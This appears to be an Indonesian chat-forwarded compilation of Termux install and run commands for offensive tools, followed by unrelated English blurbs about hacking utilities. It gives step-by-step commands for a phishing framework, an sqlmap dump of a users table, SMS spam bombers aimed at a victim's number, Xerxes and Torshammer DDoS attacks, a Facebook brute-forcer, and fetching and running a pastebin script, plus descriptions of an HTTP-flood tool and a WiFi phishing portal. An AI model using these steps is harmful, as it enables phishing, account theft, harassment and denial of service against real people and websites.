http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t [8/11 18.11] BOT X3NONOLIMIT: Hack FACEBOOK *apt update && apt upgrade *pkg install python2 && pkg install wget *pip2 install mechanize && pip2 install request *pkg install git *git clone https://github.com/tikuskecil/multi-bruteforce-facebook *cd multi-bruteforce-facebook *ls *python2 MBF.py



DDOS Tool: To take down small websites with HTTP FLOOD. Port scanner: To know the open ports of a site. FTP Password Cracker: To hack file system of websites.. Banner Grabber: To get the service or software running on a port. (After knowing the software running google for its vulnerabilities.) Web Spider: For gathering web application hacking information. Email scraper: To get all emails related to a webpage IMDB Rating: Easy way to access the movie database. Both .exe(compressed as zip) and .py versions are available in files.



An application to audit the security of WLAN Access points. The application tries to guess the access point default password via a public know algorithm. This app is NOT MEANT to be used as a hacking utility, so I'm not responsible of the usage you make of it.



An application to audit the security of WLAN Access points. The application tries to guess the access point default password via a public know algorithm. This app is NOT MEANT to be used as a hacking utility, so I'm not responsible of the usage you make of it.



👍 Awesome password to hack



:key: WiFi captive portal for ESP8266 for phishing WiFi passwords



Proof of concept for UPC UBEE router hack - WPA2 password generator
